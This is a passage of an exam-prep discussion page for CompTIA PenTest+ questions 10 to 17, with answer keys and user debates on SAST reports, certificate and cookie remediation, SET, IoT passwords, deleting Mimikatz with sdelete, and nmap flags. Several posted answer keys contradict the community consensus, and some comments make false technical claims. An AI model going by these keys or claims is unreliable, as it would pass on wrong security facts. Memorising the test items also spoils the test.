The most important thing before deleting the /tmp/apache directory is to change the permissions from 777 to 600.
upvoted 1 times

Question #10 Topic 1
Which of the following is the MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe typecasting operations
Correct Answer: C
Community vote distribution D (100%)

RRabbit Highly Voted 1 year, 8 months ago
Selected Answer: D
D. Code context for instances of unsafe typecasting operations
A static application-security test is a method of evaluating the security of an application's source code without executing it. The final report of such a test should be written for the intended audience; in this case, it's a team of application developers. The most important information that should be included in the final report is the details of the vulnerabilities found, and how to fix them. This includes providing the code context for instances of unsafe typecasting operations, that is, providing the specific lines of code where the vulnerabilities were found, and describing the specific issue that needs to be addressed. An executive summary of the penetration-testing methods used, a bill of materials including supplies, subcontracts, and costs incurred during assessment, and quantitative impact assessments given a successful software compromise are important information, but they are not as relevant as providing the code context and specific recommendations on how to fix the vulnerabilities found.
upvoted 9 times

ryanzou Highly Voted 1 year, 11 months ago
Selected Answer: D
D for sure
upvoted 5 times

Etc_Shadow28000 Most Recent 2 months, 2 weeks ago
Selected Answer: D
The most important element to include in the final report of a static application-security test intended for a team of application developers is:
D. Code context for instances of unsafe typecasting operations
Explanation:
D. Code context for instances of unsafe typecasting operations: Developers need actionable insights to understand and remediate vulnerabilities. Including code context for instances of unsafe typecasting operations will provide them with specific examples and locations within the codebase where issues occur. This information is crucial for developers to quickly identify, understand, and fix the vulnerabilities in their application.
upvoted 1 times

solutionz 1 year, 1 month ago
Selected Answer: D
In the context of a static application-security test, and with the report intended for a team of application developers, the content should focus on details that are relevant to the development team's understanding of the security issues found in the code. Among the options, the one that is most directly relevant to developers would be the details about specific code-level issues. Option D, "Code context for instances of unsafe typecasting operations," provides specific, actionable information that developers can use to understand and fix the problems in the code. The details about the specific code problems, such as unsafe typecasting operations, would enable the developers to directly address the vulnerabilities discovered in the static analysis. So the correct answer to this question would be: D. Code context for instances of unsafe typecasting operations.
upvoted 1 times

nickwen007 1 year, 6 months ago
The code context for instances of unsafe typecasting operations. This will help the developers to understand the potential security risks and enable them to make the necessary changes to their code.
upvoted 3 times

lordguck 1 year, 9 months ago
D: C+D is interesting for management and risk assessment. A for IT security and network personnel.
upvoted 1 times

lordguck 1 year, 9 months ago
Sorry, typo: not D -> B of course.
upvoted 1 times

Neolot 1 year, 11 months ago
Selected Answer: D
D is the answer, no doubt.
upvoted 5 times

pi123 1 year, 11 months ago
Selected Answer: D
I think devs are interested in code analysis.
upvoted 3 times

Chemical2007 1 year, 11 months ago
I believe the answer should be D; developers would be interested in knowing the wrong code instances used.
upvoted 3 times

Question #11 Topic 1
SIMULATION
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Correct Answer: See explanation below.
Step 1: Generate Certificate Signing Request
Step 2: Submit CSR to the CA
Step 3: Remove certificate from the server
Step 4: Install re-issued certificate on the server

[Removed] Highly Voted 9 months, 3 weeks ago
This is a 3 part PBQ: You are a penetration tester reviewing a client's website through a web browser.
Part 1. #remediatecertificates
Step 1 - Generate a Certificate Signing Request
Step 2 - Submit CSR to the CA
Step 3 - Install re-issued certificate on the server
Step 4 - Remove Certificate from Server
Part 2. #remediatecookies
HTTP | SECURE | SameSite are the fields. Below are the answers:
| ASP.NET_SessionID | False | True | True |
| _utma | False | False | False |
| _utmb | False | False | False |
| _utmc | False | False | False |
| _utmt | False | False | False |
| _utmv | False | False | False |
| _utmz | False | False | False |
| _spid0767 | False | False | False |
| _sp_id.0767 | False | False | False |
Part 3. #remediatesource
Lines 21 & 24
upvoted 12 times

Caoilfhion 9 months, 2 weeks ago
Love that you've pointed out all the vulnerabilities, but the question is asking the test taker to remediate ONLY ONE and the MOST vulnerable issue shown. CompTIA has deemed the certificate as the most vulnerable thing, but others argue for the HTML issue (which I also think should be fixed, but here we are). Taking this cert for my college coursework, and they specifically went over the PBQ to confirm that they're looking for cert remediation. Just a heads up. :)
upvoted 9 times

outnumber_gargle024 3 months, 3 weeks ago
LFG hoot hoot
upvoted 3 times

mdl0305 9 months, 3 weeks ago
For part 2, is false or true a checkmark in the box?
upvoted 4 times

RRabbit Highly Voted 1 year, 8 months ago
Generate a Certificate Signing Request (CSR): This step is the first step in the process of obtaining a new certificate. The CSR is a file that contains information about the website and the organization that operates it, as well as a public key. This file is then sent to a Certificate Authority (CA) to request a new certificate.
Submit CSR to the CA: Once the CSR is generated, it is sent to the chosen CA. The CA will then validate the information in the CSR and issue a new certificate.
Install re-issued certificate on the server: Once the new certificate is issued, it needs to be installed on the server. This step ensures that the new certificate is properly configured and can be used to secure the website.
Remove certificate from server: After the new certificate is installed, the old certificate needs to be removed from the server to avoid any confusion or security issues.
upvoted 10 times

Johnny34 Most Recent 8 months, 3 weeks ago
Can anyone explain why the ASP.net cookie is bad?
upvoted 4 times

Caoilfhion 9 months, 2 weeks ago
Heads up: THIS question was asking the test taker to remediate the MOST vulnerable thing. CompTIA has deemed the certificate as the most vulnerable thing. HOWEVER, watch the wording, because some students have reported being asked to remediate all 3! Good luck, guys!
upvoted 6 times

user548 11 months, 2 weeks ago
#remediatecertificate
Step 1: Generate Certificate Signing Request
Step 2: Submit CSR to the CA
Step 3: Install re-issued certificate on the server
Step 4: Remove certificate from the server
upvoted 3 times

user548 11 months, 2 weeks ago
#remediatesource
LINE 6-9: The CSRF token is embedded in the HTML code. While not necessarily a vulnerability on its own, the way it is used in the code can potentially lead to security issues if not handled properly.
LINE 10-12: The script tag is inserted within the select element. This allows for potential injection of arbitrary JavaScript code, which can be a security vulnerability (XSS).
LINE 14: The action attribute of the form element is populated with data from the server without proper escaping or validation. Depending on how the server handles this input, it might be a potential vulnerability.
LINE 20-26: The code contains multiple instances of input elements where the value attribute is populated with data from the server without proper escaping or validation. This can be a security risk if the data is not sanitized and validated correctly.
upvoted 4 times

user548 11 months, 2 weeks ago
#remediatecookies
| Order | HTTP | SECURE | SameSite |
|---|---|---|---|
| 1 | False | True | True |
| 2 | False | False | False |
| 3 | False | False | False |
| 4 | False | False | False |
| 5 | False | False | False |
| 6 | False | False | False |
| 7 | False | False | False |
| 8 | False | False | False |
| 9 | False | False | False |
upvoted 2 times

OnA_Mule 1 year, 5 months ago
The way this question is worded, it seems to have 2 parts. Part 1: Which is the highest vulnerability? Part 2: Remediate the vulnerability. For Part 1, everyone is assuming the expired certificate is the greater vulnerability, but I think having admin credentials in the source code of the web page is a much greater vulnerability than an expired certificate. The expired cert is definitely bad, but giving out admin credentials is so much worse. So getting rid of the commented admin and password lines should be the remediation. If you think a certificate is more important than admin rights to the website, by all means, choose this option, but I'll be going with the more severe vulnerability.
upvoted 1 times

Caoilfhion 9 months, 2 weeks ago
I agree with you, only because it feels like everyone and their mother knows to "inspect" to find that kind of stuff, even non-techie people. But unfortunately, CompTIA has deemed the certificate the main problem. Taking this exam for my college degree, and the professor went over this PBQ with a "don't get tripped up here, they're just looking for the cert". It's the only PBQ directly from the exam he went over, because of how many people trip up on this one, fixing all 3 or the "wrong" one :\
upvoted 3 times

AaronS1990 1 year, 5 months ago
Surely the Secure system box needs some input too? It looks to me as though there are checkboxes on the solution picture, but nothing is ticked.
upvoted 1 times

Frog_Man 1 year, 6 months ago
Note, there are 3 distinct labs here. Look at question #168 for the full display. People are only answering the first part.
upvoted 1 times

[Removed] 1 year, 6 months ago
Question 168 is wrong; it is a collection of 3 questions, and the answer given for the 3 questions in question 168 is wrong.
upvoted 2 times

[Removed] 1 year, 6 months ago
Check question 168 again; I answered the 3 questions with the correct answer.
upvoted 1 times

2Fish 1 year, 7 months ago
Step 1 - Generate a Certificate Signing Request
Step 2 - Submit CSR to the CA
Step 3 - Install re-issued certificate on the server
Step 4 - Remove Certificate from Server
https://www.examtopics.com/discussions/comptia/view/53668-exam-pt0-001-topic-1-question-142-discussion/
upvoted 6 times

Sborrainculo 1 year, 9 months ago
There is a misalignment between what you guys suggest in steps 3-4 and the suggested answer. Step 3 Install, Step 4 Remove. But it makes sense to do the opposite: remove the certificate first, then install the new one.
upvoted 2 times

boxv4 1 year ago
You remove last. I've had to update CA-signed certs, and what we do is technically replace the file itself, but what gets updated is the cacerts file, which contains the details of the loaded cert file that is either in p7b format or a cer file. The removal part is optional for when we do it, as we remove the files as necessary or just keep them in place with a name.old to keep a historical track of the times we've updated the certificates.
upvoted 2 times

Caoilfhion 9 months, 2 weeks ago
You don't remove an old cert before installing the new one, because you will close your connection unexpectedly and lock yourself out. Cert removal is last, if at all...
upvoted 1 times

ryanzou 1 year, 11 months ago
Step 1 - Generate a Certificate Signing Request
Step 2 - Submit CSR to the CA
Step 3 - Install re-issued certificate on the server
Step 4 - Remove Certificate from Server
upvoted 6 times

RightAsTain 1 year, 11 months ago
An expired cert still has the public key and can complete the TLS handshake. I troubleshoot cert issues at work all the time, so that definitely isn't a vulnerability. Look at the HTML. The username and password are commented out. Who cares about cookies and a secure connection when you can have access to the admin account. lol
upvoted 8 times

[Removed] 1 year, 10 months ago
As a VM engineer by day.... an expired cert is most definitely a high severity vulnerability.
upvoted 8 times

Mr_BuCk3th34D 1 year, 9 months ago
How can you tell if the cert is expired? What if one created that question from an old exam back in 2018? There's no info there to confirm that the cert is really expired. Unsecure cookies seem like a higher vulnerability to me. Talking about the username and password, those are not the credentials, they are just the field names.
upvoted 3 times

boxv4 1 year ago
On the cookies, there were sessions dated the year 2019, therefore we can safely assume the certs have expired. I asked myself the same question.
upvoted 2 times

Mr_BuCk3th34D 1 year, 9 months ago
Also - if the cookie transport security is not set up properly, the hacker can access sensitive information stored in those cookies, regardless of whether the Web application uses SSL. The attacker can then gather sensitive data stored in those cookies.
upvoted 3 times

Question #12 Topic 1
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?
A. Metasploit
B. Hydra
C. SET
D. WPScan
Correct Answer: C
Community vote distribution C (87%) 13%

Neolot Highly Voted 1 year, 11 months ago
Selected Answer: C
Definitely C. Social Engineering Toolkit is a way to test your employees' security awareness.
upvoted 15 times

vicky88__ Most Recent 7 months, 1 week ago
Selected Answer: C
SET (Social Engineering Toolkit) is the correct answer to test the security awareness of all employees.
upvoted 1 times

bieecop 1 year, 1 month ago
Metasploit (Rapid7) can generate phishing campaigns.
upvoted 1 times

solutionz 1 year, 1 month ago
Selected Answer: C
When the goal is to evaluate the security awareness level of a company's employees, a common approach is to conduct social engineering attacks to see how the employees respond. This can include phishing campaigns, pretexting, and other manipulative tactics to assess how employees handle potentially malicious scenarios. Among the options provided, the Social-Engineer Toolkit (SET) is a tool specifically designed for performing social engineering attacks. It includes functionalities for creating phishing emails, malicious websites, and other social engineering attacks that can be used to assess how employees respond to various threats. So the correct answer to this question would be: C. SET (Social-Engineer Toolkit)
upvoted 1 times

bieecop 1 year, 2 months ago
Selected Answer: C
The Social Engineering Toolkit (SET) is a tool specifically designed for conducting social engineering attacks. It includes a wide range of attack vectors and techniques to test and evaluate the security awareness of employees. Some of the features and capabilities of SET include:
upvoted 1 times

cy_analyst 1 year, 5 months ago
Selected Answer: C
The Social Engineering Toolkit (SET) is a tool that can be used by a penetration tester to evaluate the security awareness level of a company's employees. SET provides a framework for simulating various social engineering attacks, such as phishing emails, phone calls, and other techniques. By using SET, a penetration tester can craft convincing simulated attacks to see how employees respond. This can help to identify weaknesses in employee training and develop targeted security awareness training programs.
upvoted 2 times

nickwen007 1 year, 6 months ago
SET (the Social Engineering Toolkit). SET is a framework designed to help penetration testers evaluate the security awareness level of an organization by simulating real-world social engineering attacks.
upvoted 3 times

AaronS1990 1 year, 6 months ago
Selected Answer: C
SET stands for Social Engineering Toolkit and is a way to test someone's security awareness. It definitely has nothing to do with B.
upvoted 3 times

2Fish 1 year, 8 months ago
Gotta go with C. SET (Social Engineering Toolkit). This toolkit has many options to test employees' security awareness.
upvoted 4 times

mj944 1 year, 10 months ago
Selected Answer: C
SET ftw
upvoted 2 times

Masco 1 year, 10 months ago
Correct answer is B.
upvoted 1 times

dcyberguy 1 year, 10 months ago
C, SET stands out for me.
upvoted 3 times

petercorn 1 year, 11 months ago
Selected Answer: C
Social Engineering Toolkit is the best answer.
upvoted 2 times

Val3nt1n 1 year, 11 months ago
Selected Answer: B
Hydra is a password cracker.
upvoted 1 times

Manzer 1 year, 11 months ago
Selected Answer: B
I'm going with B. Hydra is a password cracker. SET is from the credit card company for their security standards. Metasploit is a toolkit for exploiting websites, and WPScan is a toolkit for exploiting WordPress.
upvoted 3 times

Manzer 1 year, 11 months ago
Should be C. SET means something else too.
upvoted 4 times

Question #13 Topic 1
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
A. Unsupported operating systems
B. Susceptibility to DDoS attacks
C. Inability to network
D. The existence of default passwords
Correct Answer: A
Community vote distribution D (97%)

Manzer Highly Voted 1 year, 11 months ago
Selected Answer: D
The IoT provides a unique opportunity for manufacturers to build devices with the ability to communicate and perform specialized functions.
However, because of the lack of rigorous testing, many devices have several insecure defaults that come preconfigured, such as the username and password. In many cases, the manufacturer has hard-coded these credentials and made them very difficult or impossible to remove. This can be dangerous, as once a malicious actor knows the type of device that is in use, they can then research the default username and password online. As a result, the team should research the default credentials for each IoT product you target during the PenTest. Section 12
upvoted 13 times

Ottris Most Recent 2 months, 1 week ago
According to CompTIA materials, the answer is A.
upvoted 1 times

Etc_Shadow28000 2 months, 2 weeks ago
Selected Answer: D
The MOST common vulnerability associated with IoT devices that are directly connected to the Internet is:
D. The existence of default passwords
Many IoT devices come with default usernames and passwords that are often not changed by the users, making these devices easy targets for attackers.
upvoted 1 times

LiveLaughToasterBath 8 months, 2 weeks ago
Selected Answer: D
Via Fortinet: Top IoT vulnerabilities include:
1. Weak/Hardcoded Passwords
2. Insecure Networks
3. Insecure Ecosystem Interfaces
4. Insecure Update Mechanisms
5. Insecure or Outdated Components
6. Lack of Proper Privacy Protection
7. Insecure Data Transfer and Storage
8. Improper Device Management
upvoted 2 times

monkeyyyyy 9 months ago
Selected Answer: D
Vote for D.
upvoted 1 times

solutionz 1 year, 1 month ago
Selected Answer: D
Internet of Things (IoT) devices often come with various security challenges, and among the listed options, the most common vulnerability is typically the existence of default passwords. Many manufacturers ship IoT devices with easily guessable default usernames and passwords, and if these credentials are not changed, attackers can easily gain unauthorized access to these devices. So the correct answer to this question would be: D. The existence of default passwords.
upvoted 2 times

user009 1 year, 5 months ago
The MOST common vulnerability associated with IoT devices that are directly connected to the Internet is option D: The existence of default passwords.
Explanation: IoT devices that are directly connected to the Internet are often shipped with default passwords that are commonly known and easily guessable. Many users do not change these default passwords, leaving the devices vulnerable to unauthorized access by attackers.
Option A, unsupported operating systems, is a vulnerability that can exist on some IoT devices, but it is not as common as default passwords.
Option B, susceptibility to DDoS attacks, is a vulnerability that can affect IoT devices that are connected to the Internet, but it is not the most common vulnerability.
Option C, inability to network, is not a common vulnerability for IoT devices that are designed to be connected to the Internet.
Therefore, the most common vulnerability associated with IoT devices that are directly connected to the Internet is option D, the existence of default passwords.
upvoted 3 times

nickwen007 1 year, 6 months ago
Many IoT device manufacturers fail to change the default passwords, which makes them vulnerable to attack by malicious actors, as they can easily gain access using the default password.
upvoted 4 times

Brayden23 1 year, 6 months ago
Selected Answer: D
D is the correct answer.
upvoted 4 times

AaronS1990 1 year, 6 months ago
Selected Answer: D
D, all day long.
upvoted 3 times

[Removed] 1 year, 7 months ago
D is correct.
upvoted 2 times

Masco 1 year, 10 months ago
How is an unsupported OS related to a vulnerability? I go for D.
upvoted 3 times

bromings 1 year, 10 months ago
Selected Answer: D
D for sure. Great article @mattmetallica
upvoted 3 times

mattmetallica 1 year, 11 months ago
I think it's D based on this...
https://www.networkworld.com/article/3332032/top-10-iot-vulnerabilities.html
upvoted 4 times

petercorn 1 year, 11 months ago
Selected Answer: B
On October 21, 2016, a widespread distributed denial of service (DDoS) attack shut down large portions of the Internet, affecting services run by Amazon, The New York Times, Twitter, Box, and other providers. The attack came in waves over the course of the day and initially mystified technologists seeking to bring systems back online. Investigation later revealed that the outages occurred when Dyn, a global provider of DNS services, suffered a debilitating attack that prevented it from answering DNS queries. Dyn received massive amounts of traffic that overwhelmed its servers. The source of all of that traffic? Attackers used an IoT botnet named Mirai to leverage the bandwidth available to baby monitors, DVRs, security cameras, and other IoT devices in the homes of normal people. Those botnetted devices received instructions from a yet-unknown attacker to simultaneously bombard Dyn with requests, knocking it (and a good part of the Internet!) offline.
upvoted 1 times

Question #14 Topic 1
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised?
A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account
C. To remove tools from the server
D. To remove a reverse shell from the system
Correct Answer: B
Community vote distribution C (100%)

Manzer Highly Voted 1 year, 11 months ago
Selected Answer: C
sdelete is used to delete files and folders. This command would delete any folder with mimikatz.*
upvoted 10 times

duckduckgooo 9 months, 1 week ago
I like adding URLs to answers/tools for others or people that had to validate the answer (me).
https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete
upvoted 2 times

petercorn Highly Voted 1 year, 11 months ago
Selected Answer: C
Agree with Manzer.
upvoted 7 times

Etc_Shadow28000 Most Recent 2 months, 2 weeks ago
Selected Answer: C
The reason a penetration tester would run the command `sdelete mimikatz.*` on a Windows server that the tester compromised is:
C. To remove tools from the server
`sdelete` is a command-line utility that securely deletes files, making them unrecoverable. Running `sdelete mimikatz.*` would securely delete the Mimikatz tool and any related files from the server, helping to cover the tester's tracks by removing evidence of the tool's presence and use.
upvoted 1 times

monkeyyyyy 9 months ago
Selected Answer: C
Vote for C.
upvoted 1 times

solutionz 1 year, 1 month ago
Selected Answer: C
The command `sdelete` is a command-line utility that can be used to securely delete files and cleanse free space on a disk in Windows. `Mimikatz` is a well-known tool used by attackers (and penetration testers) to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. In the context of the given command `sdelete mimikatz.*`, the intention is to securely delete all files related to Mimikatz from the compromised server. So the correct answer to this question would be: C. To remove tools from the server.
upvoted 3 times

cy_analyst 1 year, 5 months ago
Selected Answer: C
The sdelete command is used to securely delete files or free space on a hard drive by overwriting them with random data. Mimikatz is a tool that can be used to extract sensitive information such as passwords from a compromised Windows system.
upvoted 3 times

user009 1 year, 5 months ago
The reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised is option C: To remove tools from the server.
Explanation: Sdelete is a Windows command-line utility that securely deletes files and folders from a disk by overwriting the data with zeroes or random characters. Mimikatz is a post-exploitation tool that can be used to extract passwords and other sensitive information from a compromised Windows system. In this scenario, the penetration tester has compromised the Windows server and has used Mimikatz to extract sensitive information. The command sdelete mimikatz.* is used to securely delete the Mimikatz tool and any related files from the system to avoid leaving traces of the attack.
upvoted 2 times

KingIT_ENG 1 year, 6 months ago
CCCCCCCC
upvoted 1 times

nickwen007 1 year, 6 months ago
SDelete is a command-line utility used to securely delete files, directories and registry entries. It can also be used to remove traces of Mimikatz, a tool used to manipulate Windows authentication mechanisms. To use SDelete to remove Mimikatz, you must enter the command "sdelete -p 1 mimikatz.*" in an elevated command prompt. This will overwrite all files that contain the string "mimikatz" with random data, thus removing any trace of Mimikatz from your computer.
upvoted 2 times

nickwen007 1 year, 6 months ago
The most likely reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server is C. To remove tools from the server. This command can be used to securely delete any tools or malicious files that the tester may have installed while compromising the system, such as Mimikatz or any other malicious code.
upvoted 3 times

[Removed] 1 year, 6 months ago
C is the answer.
upvoted 1 times

Masco 1 year, 10 months ago
Correct answer is C.
upvoted 3 times

bromings 1 year, 10 months ago
Selected Answer: C
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.
SDelete accepts wild card characters as part of the directory or file specifier.
upvoted 4 times

Question #15 Topic 1
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A. nmap 192.168.1.1-5 -PU22-25,80
B. nmap 192.168.1.1-5 -PA22-25,80
C. nmap 192.168.1.1-5 -PS22-25,80
D. nmap 192.168.1.1-5 -Ss22-25,80
Correct Answer: C
Community vote distribution C (75%) D (25%)

The_F00L Highly Voted 1 year, 7 months ago
Selected Answer: C
D is the only answer that doesn't actually RUN so I don't see why that's the majority answer. Looking at nmap --help clearly shows: -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
We want TCP, so -PS will do the job. So I have to say C.
upvoted 13 times

rodwave 3 months, 2 weeks ago
This is right, the command for D doesn't work so it wouldn't run. C is the best option here.
upvoted 1 times

[Removed] 1 year, 7 months ago
What do you think about question 18?
upvoted 1 times

RRabbit Highly Voted 1 year, 8 months ago
Selected Answer: D
The correct answer is D. nmap 192.168.1.1-5 -Ss22-25,80. This command will perform a SYN scan of ports 22 through 25 and port 80 on the IP addresses 192.168.1.1 through 192.168.1.5. This scan will return any potentially vulnerable ports that might be of interest to an attacker. The capital 'S' stands for the SYN flag, which is used to initiate a connection on a TCP port. The lowercase 's' stands for the stealth flag, which is used to hide the source IP address of the scan and make it harder to detect.
upvoted 6 times

KeToopStudy 8 months, 4 weeks ago
The problem with that is the stealth scan flag is -sS not -Ss... It is not a valid flag for answer D
upvoted 4 times

Etc_Shadow28000 Most Recent 2 months, 2 weeks ago
Selected Answer: C
C.
`nmap 192.168.1.1-5 -PS22-25,80`
Explanation:
- The `-PS` option performs a TCP SYN ping scan, which sends SYN packets to the specified ports (22-25,80) on the target hosts (192.168.1.1-5) to check if those ports are open.
- While this does not perform a full vulnerability scan, it is useful for identifying live hosts with open ports, which can be the first step in identifying potentially vulnerable services.
The other options (`-PU` for UDP ping and `-PA` for ACK ping) are less likely to be useful for identifying open ports and potentially vulnerable services in this context. The -sS option (note the correct lowercase -sS instead of -Ss) is a SYN scan, which is the most effective and common way to scan for open ports. This type of scan sends SYN packets to the specified ports and determines if they are open based on the responses, making it useful for identifying potentially vulnerable services.
upvoted 2 times

Paula77 3 months ago
Selected Answer: D
The -Ss scan will provide information about open ports, which is essential for assessing potential risks.
upvoted 1 times

aa9ee6c 3 months, 2 weeks ago
C is definitely the correct answer
upvoted 1 times

Kirby87 10 months, 1 week ago
The correct answer to the question is option B: nmap 192.168.1.1-5 "PA22-25,80". The "PA" option specifies a port scan and identifies services based on their response to specific probes. This scan will return open ports 22-25 and 80, and attempt to identify potential vulnerabilities in those services.
upvoted 2 times

solutionz 1 year, 1 month ago
Selected Answer: D
Nmap is a widely used tool for network discovery and security auditing. Different options can be used to perform various types of scans. In the given context, you would likely want to use a stealthy SYN scan to identify open ports that might be running vulnerable services. The SYN scan is a popular method that's useful in port scanning as it doesn't complete the TCP handshake and is therefore considered "stealthier."
The correct option for performing a SYN scan over the specified range of IPs and ports would be:
D. `nmap 192.168.1.1-5 -sS 22-25,80`
Note the correct flag for a SYN scan is `-sS`, not `-Ss`. Therefore, it appears there may be a typographical error in the options provided, and based on the context, option D should be the correct choice if corrected to `-sS`.
upvoted 1 times

nooooo 1 year, 2 months ago
Selected Answer: D
The -sS option tells the nmap command to perform a TCP SYN scan, which is a stealthy way to scan a network. The 22-25,80 option tells the nmap command to scan the specified ports, which are commonly used by vulnerable services. Option C, nmap 192.168.1.1-5 -PS22-25,80, will return all open ports that are listening for proxy services, which are not typically vulnerable.
upvoted 1 times

MysterClyde 1 year, 3 months ago
C is correct. Ss is invalid syntax. But if it were sS, then the answer would be D for sure.
upvoted 2 times

POWNED 1 year, 4 months ago
Selected Answer: C
D is incorrect for an obvious reason: running -Ss would result in an error. It would be the correct answer if it were -sS.
upvoted 3 times

KingIT_ENG 1 year, 6 months ago
C is the correct answer
upvoted 1 times

kenechi 1 year, 6 months ago
Selected Answer: C
The ports 22, 25, 80 are all TCP ports. A SYN scan (-sS) would have done the job but since it is not listed, the -PS flag would also do a TCP SYN scan.
upvoted 4 times

[Removed] 1 year, 6 months ago
yes C is correct
upvoted 2 times

[Removed] 1 year, 7 months ago
D is correct
upvoted 1 times

dcyberguy 1 year, 10 months ago
The only issue I have is that it is written as -Ss instead of -sS
upvoted 1 times

Vikt0r 1 year, 7 months ago
I think it's a typo.
upvoted 1 times

[Removed] 1 year, 7 months ago
C is correct
upvoted 1 times

Ahegi 1 year, 6 months ago
this has to be a typo. all -P* are host discovery scans. This will not identify vulnerable ports.
upvoted 1 times

BirdLawyer 3 months, 3 weeks ago
They do a host discovery first and then they scan the ports, so sS and PS are essentially the same thing and they both send TCP SYN packets, except PS does a host discovery beforehand
upvoted 1 times

petercorn 1 year, 11 months ago
Selected Answer: C
There is no -Ss switch unless it is -sS.
upvoted 4 times

Neolot 1 year, 11 months ago
Selected Answer: C
https://www.examtopics.com/discussions/comptia/view/66643-exam-pt1-002-topic-1-question-42-discussion/
upvoted 4 times

Manzer 1 year, 11 months ago
Looks like both according to this post. https://www.linuxquestions.org/questions/linux-newbie-8/difference-beween-nmap-ps-and-ss-4175534781/
upvoted 3 times

Manzer 1 year, 11 months ago
Selected Answer: D
PS/PA/PU are host discovery scans, SS is a Scan Technique. https://nmap.org/book/man-briefoptions.html
upvoted 1 times

Question #16 Topic 1
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:
However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?
A. The HTTP port is not open on the firewall.
B. The tester did not run sudo before the command.
C. The web server is using HTTPS instead of HTTP.
D. This URI returned a server error.
Correct Answer: A
Community vote distribution D (96%) 4%

sidonpc Highly Voted 2 years ago
Selected Answer: D
This is incorrect. It should be D, mainly because if the firewall was blocking the port then none of the web directories would have been successful (200 codes). The 500 code is a server side error code, meaning the correct answer is D.
upvoted 23 times

rintaka21 2 years ago
agree on this one, it should be D.
upvoted 8 times

RRabbit Highly Voted 1 year, 8 months ago
Selected Answer: D
The most likely reason for the lack of output is D. This UR(L) returned a server error.
This is because the output of the dirb command shows that the profile URL responded with an HTTP Status Code 500, which indicates that the web server experienced an internal server error when the request was received. This could be caused by a number of things, such as a misconfigured server or a syntax error in the code. A is incorrect because the output of the dirb command indicates that the HTTP port is open. B is incorrect because the output indicates that the command was run without sudo and still produced a response. C is incorrect because the output of the dirb command indicates that the web server is using HTTP, not HTTPS.
upvoted 11 times

pizzaThyme Most Recent 1 month, 1 week ago
Selected Answer: D
Gots to be D my boy. 500 Internal Server Error as compared to 200 OK status for get/post requests
upvoted 1 times

MeisAdriano 1 month, 2 weeks ago
Selected Answer: D
As you can see in the generated result, the ...profile generated an HTTP STATUS 500 (internal server error), others have HTTP STATUS 200 ("OK")
upvoted 2 times

LiveLaughToasterBath 8 months, 1 week ago
Selected Answer: D
I googled the 500 error, for my own peace of mind. Shows as a generic, server-side error.
upvoted 1 times

bracokey 10 months ago
The answer is A. This is because of the characteristics of port 3000. This port functions as a local host web dev port and it would seem not to respond to remote requests like port 80, 443 etc. A bit like ip 127.0.0.1
upvoted 1 times

KeToopStudy 9 months ago
The port is not filtered by the firewall... if that was the case you would not receive 200 responses. And ports can be assigned any function you want. It is not obligatory for a web server to run on 80/443, it can run on whatever port you want.
upvoted 1 times

Skater_Grace 11 months, 2 weeks ago
Selected Answer: D
I think it is D.
upvoted 1 times

bieecop 1 year, 2 months ago
Selected Answer: D
Based on the provided output, the penetration tester performed a directory brute force using the Dirb tool on the target web server at http://172.16.100.10:3000. The output shows several URLs that were scanned, including http://172.16.100.10:3000/profile, which returned a server error (CODE: 500). A server error (HTTP status code 500) typically indicates an issue on the server side, such as a misconfiguration or an internal error that prevented the proper handling of the request. This can result in a blank page or an error message being displayed.
upvoted 1 times

MysterClyde 1 year, 3 months ago
The answer is D. This is a classic error a web admin or end user reports: https://support.cpanel.net/hc/en-us/articles/360051006293--HTTP-ERROR-500-PHP-website-blank-showing-a-white-page-or-Internal-Server-Err
upvoted 1 times

KingIT_ENG 1 year, 6 months ago
D is correct
upvoted 2 times

beamage 1 year, 6 months ago
Selected Answer: A
The client would have received a 500 error code in the browser, not a blank page. Firewall I'm thinking....
upvoted 2 times

[Removed] 1 year, 6 months ago
D is correct
upvoted 2 times

beamage 1 year, 6 months ago
When you visit a website your browser sends a request over to the server where the site is hosted. The server takes this request, processes it, and sends back the requested resources (PHP, HTML, CSS, etc.) along with an HTTP header. The HTTP also includes what they call an HTTP status code. A status code is a way to notify you about the status of the request. It could be a 200 status code which means “Everything is OK” or a 500 status code which means something has gone wrong.
upvoted 1 times

[Removed] 1 year, 6 months ago
Read again, D is the answer
upvoted 2 times

The_F00L 1 year, 7 months ago
Answer is D. Know your output, and know your HTTP. Keep an eye on those response codes. 500 is a server error.
upvoted 5 times

chameleon_eh 1 year, 8 months ago
The answer is D, based on the error code. https://developer.mozilla.org/en-US/docs/Web/HTTP/Status
upvoted 4 times

Masco 1 year, 10 months ago
The correct answer is D and I second sidonpc
upvoted 3 times

petercorn 1 year, 11 months ago
Selected Answer: D
Agree with answer D.
upvoted 3 times

petercorn 1 year, 11 months ago
The HTTP status code 500 is a generic error response. It means that the server encountered an unexpected condition that prevented it from fulfilling the request.
upvoted 4 times

Question #17 Topic 1
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following MOST likely describes what happened?
A. The penetration tester was testing the wrong assets.
B. The planning process failed to ensure all teams were notified.
C. The client was not ready for the assessment to start.
D. The penetration tester had incorrect contact information.
Correct Answer: B
